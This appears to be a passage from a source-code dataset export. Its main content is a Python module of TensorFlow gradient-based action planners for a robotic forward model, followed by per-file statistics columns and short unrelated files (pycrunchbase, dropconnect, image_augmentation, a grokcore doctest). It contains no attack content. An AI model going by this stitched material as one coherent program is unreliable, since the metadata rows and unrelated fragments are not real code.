        S1_loss_list = []
        Sn_loss_list = []
        for i in range(0, 101):
            feed_dict = {self.S_init_ph: S_init, self.S_goal_ph: S_goal, self.action_ph: action}
            S1_loss, Sn_loss = self.sess.run([self.objective_list[0], self.objective_list[steps - 1]], feed_dict=feed_dict)
            S1_loss_list.append(S1_loss)
            Sn_loss_list.append(Sn_loss)
            if plot_loss and i % 20 == 0:
                self.vis_tool._display([[range(i + 1), S1_loss_list], [range(i + 1), Sn_loss_list]])
            gradient = np.array(self.sess.run(action_grad, feed_dict = feed_dict)[0])
            if np.isnan(gradient).any():
                # NaN gradient: restart from a random action sequence.
                action = np.random.rand(self.max_length, 1, 4) - 0.5
                print('nan gradient step{}'.format(i))
                import pdb; pdb.set_trace()
            else:
                # Clip the gradient norm to 4 * steps before stepping.
                if np.linalg.norm(gradient) > steps * 4:
                    gradient = gradient / np.linalg.norm(gradient) * 4 * steps
                action -= gradient / 1.0 * self.init_lr
                # Keep actions inside the valid [-1, 1] range.
                action = np.clip(action, -1, 1)
        return action[0][0], self.sess.run([self.arm_loss_list[0], self.box_loss_list[0], self.forward_model_list[0].output], feed_dict)
class FastClippedSgdShootingForwardModelPlanner(object):
    """Shooting planner optimizing an action sequence by clipped gradient descent.

    Unrolls ``max_length`` weight-tied forward models; the objective for step t
    is the loss of step t's predicted state only (no accumulation).
    """

    def __init__(
            self,
            dynamic_model,
            encoder,
            env,
            init_lr=0.5,
            sess=None,
            pos_only=False,
            max_length=15,
            ):
        """Build the unrolled graph and per-horizon objectives/gradients.

        Args:
            dynamic_model: forward model exposing ``get_weight_tied_copy``.
            encoder: state encoder exposing ``get_weight_tied_copy``.
            env: environment providing ``observation_space.shape``.
            init_lr: base step size used by get_action's updates.
            sess: TF session; defaults to the current default session.
            pos_only: if True, penalize only the first 6 state dims.
            max_length: maximum planning horizon.
        """
        self.env = env
        if sess == None:
            sess = tf.get_default_session()
        self.sess = sess
        self.init_lr = init_lr
        self.max_length = max_length
        # Action sequence placeholder: [horizon, batch=1, action_dim=4].
        self.action_ph = tf.placeholder(tf.float32, [max_length, 1, 4])
        self.forward_model_list = []
        # Build the recurrent model w.r.t. the max length.
        self.S_init_ph = tf.placeholder(tf.float32, list(env.observation_space.shape))
        self.S_goal_ph = tf.placeholder(tf.float32, list(env.observation_space.shape))
        # Only two feature encoders (init and goal states).
        self.encoder1 = encoder.get_weight_tied_copy(observation_input=[self.S_init_ph])
        self.encoder2 = encoder.get_weight_tied_copy(observation_input=[self.S_goal_ph])
        forward_model = dynamic_model.get_weight_tied_copy(feature_input=self.encoder1.output,
                                                           action_input=self.action_ph[0])
        self.forward_model_list.append(forward_model)
        self.forward_model_output_list = [forward_model.output]
        # Chain the remaining steps: each model consumes the previous prediction.
        for i in range(1, max_length):
            forward_model = dynamic_model.get_weight_tied_copy(feature_input=forward_model.output,
                                                               action_input=self.action_ph[i])
            self.forward_model_list.append(forward_model)
            self.forward_model_output_list.append(forward_model.output)
        ## objective: one per horizon length
        self.objective_list = []
        self.arm_loss_list = []
        self.box_loss_list = []
        if pos_only:
            for forward_model in self.forward_model_list:
                self.objective_list.append(tf.reduce_sum(tf.square(forward_model.output[0][:6] - self.encoder2.output[0][:6])))
                self.arm_loss_list.append(tf.reduce_sum(tf.square(forward_model.output[0][:4] - self.encoder2.output[0][:4])))
                self.box_loss_list.append(tf.reduce_sum(tf.square(forward_model.output[0][4:6] - self.encoder2.output[0][4:6])))
        else:
            for forward_model in self.forward_model_list:
                self.objective_list.append(tf.reduce_sum(tf.square(forward_model.output[0] - self.encoder2.output[0])))
                # BUGFIX: also populate the diagnostic loss lists on this branch
                # (consistent with CEMPlanner); previously they stayed empty and
                # get_action's final fetch raised IndexError when pos_only=False.
                self.arm_loss_list.append(tf.reduce_sum(tf.square(forward_model.output[0][:4] - self.encoder2.output[0][:4])))
                self.box_loss_list.append(tf.reduce_sum(tf.square(forward_model.output[0][4:6] - self.encoder2.output[0][4:6])))
        self.action_grad_list = []
        for obj in self.objective_list:
            # Those tail terms in action_ph will receive 0 gradient.
            self.action_grad_list.append(tf.gradients(obj, self.action_ph))
        # Live plotting helper: 1-step objective and n-step objective.
        self.vis_tool = MyAnimationMulti(None, numPlots=2, isIm=[0, 0], axTitles=['(S1-S_goal)^2', '(S_n-S_goal)^2'])

    def get_action(self, S_init, S_goal, steps=None, plot_loss=False):
        """Optimize the action sequence with 51 clipped, decayed gradient steps.

        Returns:
            (first_action, planner_info(arm_loss, box_loss, predicted rollout)).
        """
        if steps == None:
            steps = 1  # greedy planner
        else:
            assert (steps <= self.max_length)
        action = np.zeros([self.max_length, 1, 4])
        action_grad = self.action_grad_list[steps - 1]
        # TODO: Find a good stop criteria
        now = time.time()
        S1_loss_list = []
        Sn_loss_list = []
        for i in range(0, 51):
            feed_dict = {self.S_init_ph: S_init, self.S_goal_ph: S_goal, self.action_ph: action}
            # BUGFIX: fetch the objectives (matching the plot titles) instead of
            # box_loss_list, which was empty when pos_only=False (the default)
            # and raised IndexError; the _cumulated_obj sibling does the same.
            S1_loss, Sn_loss = self.sess.run([self.objective_list[0], self.objective_list[steps - 1]], feed_dict=feed_dict)
            S1_loss_list.append(S1_loss)
            Sn_loss_list.append(Sn_loss)
            if plot_loss and i % 1 == 0:
                self.vis_tool._display([[range(i + 1), S1_loss_list], [range(i + 1), Sn_loss_list]])
            gradient = np.array(self.sess.run(action_grad, feed_dict=feed_dict)[0])
            if np.isnan(gradient).any():
                # NaN gradient: restart from a random action sequence.
                action = np.random.rand(self.max_length, 1, 4) - 0.5
                print('nan gradient step{}'.format(i))
                import pdb; pdb.set_trace()
            else:
                # Clip the gradient norm to 4 * steps, then take a decayed step.
                if np.linalg.norm(gradient) > steps * 4:
                    gradient = gradient / np.linalg.norm(gradient) * 4 * steps
                action -= gradient / (1. + i * 0.05) * self.init_lr
                # Keep actions inside the valid [-1, 1] range.
                action = np.clip(action, -1, 1)
        arm_loss, box_loss, forward_models_outputs = \
            self.sess.run([self.arm_loss_list[0], self.box_loss_list[0],
                           self.forward_model_output_list], feed_dict)
        return action[0][0], planner_info(arm_loss, box_loss, forward_models_outputs[:steps])
class FastClippedSgdForwardModelPlanner(object):
    """One-step (greedy) planner: optimizes a single action by manual gradient descent.

    Computes d(objective)/d(action) symbolically and applies clipped, decayed
    update steps in NumPy rather than through a TF optimizer.
    """
    def __init__(
            self,
            dynamic_model,
            encoder,
            env,
            action_initializer = None,
            init_lr = 1,
            sess = None,
            pos_only = False,
            ):
        """Build the one-step forward model graph and its action gradient.

        Args:
            dynamic_model: forward model exposing ``get_weight_tied_copy``.
            encoder: state encoder exposing ``get_weight_tied_copy``.
            env: environment providing ``observation_space.shape``.
            action_initializer: NOTE(review): accepted but never used.
            init_lr: NOTE(review): accepted but never used — get_action
                hard-codes its step size (0.5). Confirm which is intended.
            sess: TF session; defaults to the current default session.
            pos_only: if True, objective covers only the first 6 state dims.
        """
        if sess == None:
            sess =tf.get_default_session()
        self.sess = sess
        # with tf.variable_scope('action_optimizer'):
        #     self.action = tf.get_variable('planner_action', [1] + list(env.action_space.shape), initializer=action_initializer)
        # Single action fed as a placeholder; updates happen outside the graph.
        self.action_ph = tf.placeholder(tf.float32, [None, 4])
        self.S_init_ph = tf.placeholder(tf.float32, list(env.observation_space.shape))
        self.S_goal_ph = tf.placeholder(tf.float32, list(env.observation_space.shape))
        self.encoder1 = encoder.get_weight_tied_copy(observation_input=[self.S_init_ph])
        self.encoder2 = encoder.get_weight_tied_copy(observation_input=[self.S_goal_ph])
        self.forward_model = dynamic_model.get_weight_tied_copy(feature_input=self.encoder1.output,
                                                                action_input=self.action_ph)
        ## objective: squared distance between predicted next state and goal
        if pos_only:
            self.objective = tf.reduce_sum(tf.square(self.forward_model.output[0][:6] - self.encoder2.output[0][:6]))
        else:
            self.objective = tf.reduce_sum(tf.square(self.forward_model.output - self.encoder2.output))
        # Diagnostic losses (dims 0:4 = arm, 4:6 = box — TODO confirm).
        self.arm_loss = tf.reduce_sum(tf.square(self.forward_model.output[0][:4] - self.encoder2.output[0][:4]))
        self.box_loss = tf.reduce_sum(tf.square(self.forward_model.output[0][4:6] - self.encoder2.output[0][4:6]))
        #Adam optimizer has its own variables. Wrap it by a namescope
        self.action_grad = tf.gradients(self.objective, self.action_ph)
        # with tf.variable_scope('action_optimizer'):
        #     self.action_opt = tf.train.AdamOptimizer(init_lr).minimize(self.objective, var_list = [self.clipped_action])
        # self.action_gradient = tf.train.AdamOptimizer(init_lr).compute_gradients(self.objective, var_list = [self.action])
    def get_action(self, S_init, S_goal):
        """Gradient-descend one action (clipped to [-1, 1]) to move S_init toward S_goal.

        Returns:
            (action, [arm_loss, box_loss]) evaluated at the last feed_dict.
        """
        # Random start in [-0.5, 0.5).
        action = np.random.rand(4)-0.5
        # TODO: Find a good stop criteria
        now = time.time()
        for i in range(0,151):
            feed_dict = {self.S_init_ph:S_init, self.S_goal_ph:S_goal, self.action_ph : [action]}
            gradient = self.sess.run([self.action_grad], feed_dict = feed_dict)[0][0][0]
            #raises NotImplementedError: ('Trying to optimize unsupported type ', <tf.Tensor 'clip_by_value:0' shape=(1, 4) dtype=float32>)
            #this code does not work....
            # import pdb; pdb.set_trace()
            # Decayed step: 0.5 / (1 + 0.2*i). NOTE(review): ignores init_lr.
            action -= gradient/(1.+i*0.2)*0.5
            # Keep the action inside the valid [-1, 1] range.
            action = np.clip(action, -1, 1)
            if i %50 == 0:
                print("#########Optimizing action#########")
                action_loss = self.sess.run(self.objective, feed_dict = feed_dict)
                print("action_loss(sum_square_error(S_goal, S_next)) is {}".format(action_loss))
                print("current_action is {}".format(action))
                # print("current s_next is {}".format(self.sess.run(self.forward_model.output, feed_dict = feed_dict)))
                print("{} sec elapsed for 50 gradient steps".format(time.time() - now))
                now = time.time()
        return action, self.sess.run([ self.arm_loss, self.box_loss], feed_dict = feed_dict)
class SgdForwardModelPlanner(object):
    """One-step planner that optimizes a TF action variable with Adam.

    The action is a ``tf.Variable``; Adam minimizes the squared distance between
    the predicted next state and the goal state.
    """

    def __init__(
            self,
            dynamic_model,
            encoder,
            env,
            action_initializer=None,
            init_lr=1e-1,
            sess=None,
            pos_only=False,
            ):
        """Build the graph: action variable, forward model, objective, optimizer.

        Args:
            dynamic_model: forward model exposing ``get_weight_tied_copy``.
            encoder: state encoder exposing ``get_weight_tied_copy``.
            env: environment providing observation/action space shapes.
            action_initializer: initializer for the action variable; defaults
                to uniform in [-0.1, 0.1].
            init_lr: Adam learning rate.
            sess: TF session; defaults to the current default session.
            pos_only: if True, objective covers only the first 6 state dims.
        """
        if sess == None:
            sess = tf.get_default_session()
        self.sess = sess
        ## re-construct the model
        if action_initializer is None:
            action_initializer = tf.random_uniform_initializer(minval=-0.1, maxval=0.1)
        with tf.variable_scope('action_optimizer'):
            self.action = tf.get_variable('planner_action', [1] + list(env.action_space.shape), initializer=action_initializer)
        self.clipped_action = tf.clip_by_value(self.action, -1, 1)
        self.S_init_ph = tf.placeholder(tf.float32, list(env.observation_space.shape))
        self.S_goal_ph = tf.placeholder(tf.float32, list(env.observation_space.shape))
        self.encoder1 = encoder.get_weight_tied_copy(observation_input=[self.S_init_ph])
        self.encoder2 = encoder.get_weight_tied_copy(observation_input=[self.S_goal_ph])
        self.forward_model = dynamic_model.get_weight_tied_copy(feature_input=self.encoder1.output,
                                                                action_input=self.action)
        ## objective: squared distance between predicted next state and goal
        if pos_only:
            self.objective = tf.reduce_sum(tf.square(self.forward_model.output[0][:6] - self.encoder2.output[0][:6]))
        else:
            self.objective = tf.reduce_sum(tf.square(self.forward_model.output - self.encoder2.output))
        # Adam optimizer has its own variables. Wrap it by a namescope.
        with tf.variable_scope('action_optimizer'):
            # BUGFIX: optimize the underlying variable, not the clip_by_value op.
            # Passing self.clipped_action raised NotImplementedError ("Trying to
            # optimize unsupported type ... clip_by_value"), as the old comments
            # in get_action recorded; ClippedSgdForwardModelPlanner already
            # optimizes self.action.
            self.action_opt = tf.train.AdamOptimizer(init_lr).minimize(self.objective, var_list=[self.action])

    def get_action(self, S_init, S_goal):
        """Re-initialize the action and run 150 Adam steps toward S_goal.

        Returns:
            [action_value, objective_value] from the final session run.
        """
        # First re-initialize every variable in "action_optimizer"
        # (the action itself plus Adam's slot variables).
        variables = tf.get_collection(tf.GraphKeys.VARIABLES, scope='action_optimizer')
        self.sess.run(tf.initialize_variables(variables))
        feed_dict = {self.S_init_ph: S_init, self.S_goal_ph: S_goal}
        # TODO: Find a good stop criteria
        now = time.time()
        for i in range(0, 150):
            self.sess.run([self.action_opt], feed_dict=feed_dict)
            if i % 50 == 0:
                print("#########Optimizing action#########")
                action_loss = self.sess.run(self.objective, feed_dict=feed_dict)
                print("action_loss(sum_square_error(S_goal, S_next)) is {}".format(action_loss))
                print("current_action is {}".format(self.sess.run(self.action)))
                # print("current s_next is {}".format(self.sess.run(self.forward_model.output, feed_dict = feed_dict)))
                print("{} sec elapsed for 50 gradient steps".format(time.time() - now))
                now = time.time()
        return self.sess.run([self.action, self.objective], feed_dict=feed_dict)

    # debug API
    def predict_next_state(self, current_state, action, goal_state):
        """Evaluate the forward model for an explicit action, then restore the old one."""
        feed_dict = {self.S_init_ph: current_state, self.S_goal_ph: goal_state}
        old_action = self.sess.run(self.action)
        # Assign the new action.
        self.sess.run(self.action.assign([action]))
        next_state, S_init, S_goal, loss = self.sess.run([self.forward_model.output,
                                                          self.encoder1.output,
                                                          self.encoder2.output,
                                                          self.objective], feed_dict=feed_dict)
        # Assign back the old action.
        self.sess.run(self.action.assign(old_action))
        return next_state, S_init, S_goal, loss
class ClippedSgdForwardModelPlanner(object):
    """One-step planner that optimizes a TF action variable with Adam.

    NOTE(review): despite the name, the optimizer runs on the raw (unclipped)
    variable and get_action returns self.action, not self.clipped_action —
    clipping only affects the printed value. Confirm this is intended.
    """
    def __init__(
            self,
            dynamic_model,
            encoder,
            env,
            action_initializer = None,
            init_lr = 1e-1,
            sess = None,
            pos_only = False,
            ):
        """Build the graph: action variable, forward model, objective, optimizer.

        Args:
            dynamic_model: forward model exposing ``get_weight_tied_copy``.
            encoder: state encoder exposing ``get_weight_tied_copy``.
            env: environment providing observation/action space shapes.
            action_initializer: initializer for the action variable; defaults
                to uniform in [-0.1, 0.1].
            init_lr: Adam learning rate.
            sess: TF session; defaults to the current default session.
            pos_only: if True, objective covers only the first 6 state dims.
        """
        if sess == None:
            sess =tf.get_default_session()
        self.sess = sess
        ##re-construct the model
        if action_initializer is None:
            action_initializer = tf.random_uniform_initializer(minval=-0.1, maxval=0.1)
        with tf.variable_scope('action_optimizer'):
            self.action = tf.get_variable('planner_action', [1] + list(env.action_space.shape), initializer=action_initializer)
        # Clipped view of the action; used for display only (see class note).
        self.clipped_action = tf.clip_by_value(self.action, -1, 1)
        self.S_init_ph = tf.placeholder(tf.float32, list(env.observation_space.shape))
        self.S_goal_ph = tf.placeholder(tf.float32, list(env.observation_space.shape))
        self.encoder1 = encoder.get_weight_tied_copy(observation_input=[self.S_init_ph])
        self.encoder2 = encoder.get_weight_tied_copy(observation_input=[self.S_goal_ph])
        self.forward_model = dynamic_model.get_weight_tied_copy(feature_input=self.encoder1.output,
                                                                action_input=self.action)
        ## objective: squared distance between predicted next state and goal
        if pos_only:
            self.objective = tf.reduce_sum(tf.square(self.forward_model.output[0][:6] - self.encoder2.output[0][:6]))
        else:
            self.objective = tf.reduce_sum(tf.square(self.forward_model.output - self.encoder2.output))
        #Adam optimizer has its own variables. Wrap it by a namescope
        with tf.variable_scope('action_optimizer'):
            self.action_opt = tf.train.AdamOptimizer(init_lr).minimize(self.objective, var_list = [self.action])
            self.action_gradient = tf.train.AdamOptimizer(init_lr).compute_gradients(self.objective, var_list = [self.action])
    def get_action(self, S_init, S_goal):
        """Re-initialize the action and run 150 Adam steps toward S_goal.

        Returns:
            [action_value, objective_value] from the final session run.
        """
        #first re-initialize everyvariables in "action_optimizer"
        variables = tf.get_collection(tf.GraphKeys.VARIABLES, scope='action_optimizer')
        self.sess.run(tf.initialize_variables(variables))
        feed_dict = {self.S_init_ph:S_init, self.S_goal_ph:S_goal}
        # TODO: Find a good stop criteria
        now = time.time()
        for i in range(0,150):
            #normal speed
            self.sess.run([self.action_opt], feed_dict = feed_dict)
            #slow and will be slower and slower
            # self.sess.run([self.clipped_action, self.action.assign(self.clipped_action), self.action_opt], \
            #               feed_dict = feed_dict)
            if i %50 == 0:
                print("#########Optimizing action#########")
                action_loss = self.sess.run(self.objective, feed_dict = feed_dict)
                print("action_loss(sum_square_error(S_goal, S_next)) is {}".format(action_loss))
                print("current_action is {}".format(self.sess.run(self.clipped_action)))
                # print("current s_next is {}".format(self.sess.run(self.forward_model.output, feed_dict = feed_dict)))
                print("{} sec elapsed for 100 gradient steps".format(time.time() - now))
                now = time.time()
        return self.sess.run([self.action, self.objective], feed_dict = feed_dict)
    #debug API
    def predict_next_state(self, current_state, action, goal_state):
        """Evaluate the forward model for an explicit action, then restore the old one."""
        feed_dict = {self.S_init_ph:current_state, self.S_goal_ph: goal_state}
        old_action = self.sess.run(self.action)
        #assign new action
        self.sess.run(self.action.assign([action]))
        next_state, S_init, S_goal, loss = self.sess.run([self.forward_model.output,\
                                                          self.encoder1.output,\
                                                          self.encoder2.output,\
                                                          self.objective], feed_dict = feed_dict)
        #assign back the old action
        self.sess.run(self.action.assign(old_action))
        return next_state, S_init, S_goal, loss
from sandbox.rocky.tf.core.parameterized import Parameterized
class ParameterizedAction(Parameterized):
    """Wraps a single planner action stored as a TF variable.

    The variable lives in the 'action_optimizer' scope so it can be
    re-initialized independently of the model weights.
    """

    def __init__(self, env, sess, action_initializer=None):
        """Create the action variable.

        Args:
            env: environment providing ``action_space.shape``.
            sess: TF session used for all reads/writes.
            action_initializer: initializer for the action variable; defaults
                to uniform in [-0.1, 0.1].
        """
        Parameterized.__init__(self)
        if action_initializer is None:
            action_initializer = tf.random_uniform_initializer(minval=-0.1, maxval=0.1)
        with tf.variable_scope('action_optimizer'):
            self.action = tf.get_variable('planner_action', [1] + list(env.action_space.shape), initializer=action_initializer)
        self.sess = sess
        self.env = env

    def get_action(self):
        """Return the current value of the action variable."""
        return self.sess.run(self.action)

    def initalize_action(self):
        """Reset the action variable to its initializer's distribution."""
        # BUGFIX: tf.initialize_variables expects a list of variables, not a
        # bare Variable (see the other call sites in this file).
        self.sess.run(tf.initialize_variables([self.action]))
        return

    # Correctly-spelled alias; the original (misspelled) name is kept for
    # backward compatibility with existing callers.
    initialize_action = initalize_action
class ConstrainedForwardModelPlanner(object):
    """One-step planner using SciPy SLSQP with inequality constraints |a_i| <= 1."""
    def __init__(
            self,
            dynamic_model,
            encoder,
            env,
            sess = None,
            pos_only = False,
            action_initializer = None,
            optimizer = tf.contrib.opt.ScipyOptimizerInterface,
            ):
        """Build the one-step graph, objective, and action-bound constraints.

        Args:
            dynamic_model: forward model exposing ``get_weight_tied_copy``.
            encoder: state encoder exposing ``get_weight_tied_copy``.
            env: environment providing ``observation_space.shape``.
            sess: TF session; defaults to the current default session.
            pos_only: if True, objective covers only the first 6 state dims.
            action_initializer: initializer for the action variable; defaults
                to uniform in [-0.1, 0.1].
            optimizer: NOTE(review): accepted but unused — get_action constructs
                ScipyOptimizerInterface directly.
        """
        if sess == None:
            sess =tf.get_default_session()
        self.sess = sess
        if action_initializer is None:
            action_initializer = tf.random_uniform_initializer(minval=-0.1, maxval=0.1)
        with tf.variable_scope('action_optimizer'):
            self.action = tf.get_variable('planner_action', [1,4], initializer=action_initializer)
        ## rebuild the dynamic model
        self.S_init_ph = tf.placeholder(tf.float32, list(env.observation_space.shape))
        self.S_goal_ph = tf.placeholder(tf.float32, list(env.observation_space.shape))
        self.encoder1 = encoder.get_weight_tied_copy(observation_input=[self.S_init_ph])
        self.encoder2 = encoder.get_weight_tied_copy(observation_input=[self.S_goal_ph])
        self.forward_model = dynamic_model.get_weight_tied_copy(feature_input=self.encoder1.output,
                                                                action_input=self.action)
        ## objective: squared distance between predicted next state and goal
        if pos_only:
            self.objective = tf.reduce_sum(tf.square(self.forward_model.output[0][:6] - self.encoder2.output[0][:6]))
        else:
            self.objective = tf.reduce_sum(tf.square(self.forward_model.output - self.encoder2.output))
        self.loss = self.objective
        # Inequality constraints 1 - a_i^2 >= 0, i.e. each action dim in [-1, 1].
        self.inequalities = []
        for i in range(4):
            self.inequalities.append(1-tf.square(self.action[0][i]))
        # Our default SciPy optimization algorithm, L-BFGS-B, does not support
        # general constraints. Thus we use SLSQP instead.
    def get_action(self, S_init, S_goal):
        """Re-initialize the action, then run constrained SLSQP to reach S_goal.

        Returns:
            [action_value, loss_value] from the final session run.
        """
        #first re-initialize everyvariables in "action_optimizer"
        self.sess.run(tf.initialize_variables([self.action]))
        feed_dict = {self.S_init_ph:S_init, self.S_goal_ph:S_goal}
        # need to re-initialize optimizer every time want to use it or it will optimize action without enforcing constrains.
        optimizer = tf.contrib.opt.ScipyOptimizerInterface(
            self.loss, var_list = [self.action], inequalities=self.inequalities, method='SLSQP')
        now = time.time()
        optimizer.minimize(self.sess, feed_dict = feed_dict)
        print("it takes {} to optimize the action".format(time.time() - now))
        return self.sess.run([self.action, self.loss], feed_dict = feed_dict)
| 42.500586
| 172
| 0.715582
| 5,532
| 36,253
| 4.42462
| 0.065799
| 0.052457
| 0.040446
| 0.023287
| 0.88671
| 0.867917
| 0.856641
| 0.842505
| 0.833762
| 0.820117
| 0
| 0.020035
| 0.153284
| 36,253
| 853
| 173
| 42.500586
| 0.777365
| 0.135354
| 0
| 0.789303
| 0
| 0
| 0.031687
| 0.005632
| 0
| 0
| 0
| 0.001172
| 0.009724
| 1
| 0.045381
| false
| 0
| 0.016207
| 0.004862
| 0.106969
| 0.032415
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
391022300e688e6c5ab4b77b3a3105685361a314
| 732
|
py
|
Python
|
src/pycrunchbase/__init__.py
|
ngzhian/pycrunchbase
|
4dbe65d6fc07ce89334b7bf142342b90f29df64b
|
[
"MIT"
] | 67
|
2015-02-15T03:02:00.000Z
|
2021-07-04T02:12:29.000Z
|
src/pycrunchbase/__init__.py
|
ngzhian/pycrunchbase
|
4dbe65d6fc07ce89334b7bf142342b90f29df64b
|
[
"MIT"
] | 29
|
2015-02-16T02:04:50.000Z
|
2020-12-02T18:06:17.000Z
|
src/pycrunchbase/__init__.py
|
ngzhian/pycrunchbase
|
4dbe65d6fc07ce89334b7bf142342b90f29df64b
|
[
"MIT"
] | 44
|
2015-02-26T05:43:10.000Z
|
2020-12-02T02:11:39.000Z
|
from .pycrunchbase import (
CrunchBase,
)
from .resource import (
Acquisition,
Address,
Category,
Degree,
FundingRound,
Fund,
Image,
Investment,
IPO,
Job,
Location,
News,
Organization,
Page,
PageItem,
Person,
Product,
Relationship,
StockExchange,
Video,
Website,
)
__version__ = "0.3.9"
__all__ = [
'Acquisition',
'Address',
'Category',
'Degree',
'FundingRound',
'Fund',
'Image',
'Investment',
'IPO',
'Job',
'Location',
'News',
'Organization',
'Page',
'PageItem',
'Person',
'Product',
'Relationship',
'StockExchange',
'Video',
'Website',
'CrunchBase'
]
| 13.309091
| 27
| 0.534153
| 55
| 732
| 6.963636
| 0.563636
| 0.093995
| 0.13577
| 0.167102
| 0.809399
| 0.809399
| 0.809399
| 0.809399
| 0.809399
| 0.809399
| 0
| 0.006098
| 0.327869
| 732
| 54
| 28
| 13.555556
| 0.772358
| 0
| 0
| 0
| 0
| 0
| 0.23224
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.039216
| 0
| 0.039216
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
39108aaa5f16646a3ed5c0e0afaec3e5dff388ad
| 107
|
py
|
Python
|
dropconnect_tensorflow/__init__.py
|
AryaAftab/dropconnect-tensorflow
|
648db31e8d60b4de4bf6e37e5a18e2b220ac1616
|
[
"MIT"
] | 2
|
2021-08-31T15:51:55.000Z
|
2021-10-18T07:19:19.000Z
|
dropconnect_tensorflow/__init__.py
|
AryaAftab/dropconnect-tensorflow
|
648db31e8d60b4de4bf6e37e5a18e2b220ac1616
|
[
"MIT"
] | null | null | null |
dropconnect_tensorflow/__init__.py
|
AryaAftab/dropconnect-tensorflow
|
648db31e8d60b4de4bf6e37e5a18e2b220ac1616
|
[
"MIT"
] | null | null | null |
from dropconnect_tensorflow.dropconnect_tensorflow import DropConnectDense, DropConnectConv2D, DropConnect
| 53.5
| 106
| 0.915888
| 9
| 107
| 10.666667
| 0.666667
| 0.4375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009901
| 0.056075
| 107
| 1
| 107
| 107
| 0.940594
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
393790c6c74505311873a4d3f3d4433885613ee4
| 289
|
py
|
Python
|
image_augmentation/preprocessing/__init__.py
|
tanzhenyu/image_augmentation
|
d1f8cc35cf25438556e7934e8e6c78827819ea9d
|
[
"Apache-2.0"
] | 6
|
2020-08-26T18:54:42.000Z
|
2020-11-22T02:45:37.000Z
|
image_augmentation/preprocessing/__init__.py
|
tanzhenyu/image_augmentation
|
d1f8cc35cf25438556e7934e8e6c78827819ea9d
|
[
"Apache-2.0"
] | 3
|
2020-07-13T13:44:09.000Z
|
2022-02-10T02:12:46.000Z
|
image_augmentation/preprocessing/__init__.py
|
tanzhenyu/image_augmentation
|
d1f8cc35cf25438556e7934e8e6c78827819ea9d
|
[
"Apache-2.0"
] | 1
|
2021-03-24T09:51:22.000Z
|
2021-03-24T09:51:22.000Z
|
from image_augmentation.preprocessing.preprocess import cifar_baseline_augmentation, cifar_standardization
from image_augmentation.preprocessing.preprocess import imagenet_baseline_augmentation, imagenet_standardization
from image_augmentation.preprocessing import efficientnet_preprocess
| 72.25
| 112
| 0.927336
| 29
| 289
| 8.896552
| 0.37931
| 0.104651
| 0.244186
| 0.395349
| 0.635659
| 0.387597
| 0
| 0
| 0
| 0
| 0
| 0
| 0.048443
| 289
| 3
| 113
| 96.333333
| 0.938182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2030a605cd752d14f209c7587eb4ae5e80ff522c
| 551
|
py
|
Python
|
src/grokcore/component/tests/adapter/importedmodel.py
|
zopefoundation/grokcore.component
|
ae027df4c0bccf59ab8358b46495456682158837
|
[
"ZPL-2.1"
] | 1
|
2018-03-19T01:53:45.000Z
|
2018-03-19T01:53:45.000Z
|
src/grokcore/component/tests/adapter/importedmodel.py
|
zopefoundation/grokcore.component
|
ae027df4c0bccf59ab8358b46495456682158837
|
[
"ZPL-2.1"
] | 6
|
2015-04-21T13:26:52.000Z
|
2020-11-24T07:03:27.000Z
|
src/grokcore/component/tests/adapter/importedmodel.py
|
zopefoundation/grokcore.component
|
ae027df4c0bccf59ab8358b46495456682158837
|
[
"ZPL-2.1"
] | 4
|
2015-04-03T04:48:13.000Z
|
2018-01-12T06:50:02.000Z
|
"""
Imported model and adapter won't be grokked:
>>> import grokcore.component as grok
>>> grok.testing.grok(__name__)
>>> from grokcore.component.tests.adapter.adapter import IHome
>>> cave = Cave()
>>> home = IHome(cave)
Traceback (most recent call last):
...
TypeError: ('Could not adapt', <grokcore.component.tests.adapter.adapter.Cave object at ...>, <InterfaceClass grokcore.component.tests.adapter.adapter.IHome>)
""" # noqa: E501 line too long
from grokcore.component.tests.adapter.adapter import Cave, Home # noqa: F401
| 36.733333
| 160
| 0.713249
| 70
| 551
| 5.557143
| 0.542857
| 0.218509
| 0.226221
| 0.298201
| 0.421594
| 0.236504
| 0.236504
| 0
| 0
| 0
| 0
| 0.012766
| 0.147005
| 551
| 14
| 161
| 39.357143
| 0.814894
| 0.856624
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b3b308144a89e4fa0b94da6be42bebb4778d0030
| 88
|
py
|
Python
|
autorop/call/__init__.py
|
mariuszskon/autorop
|
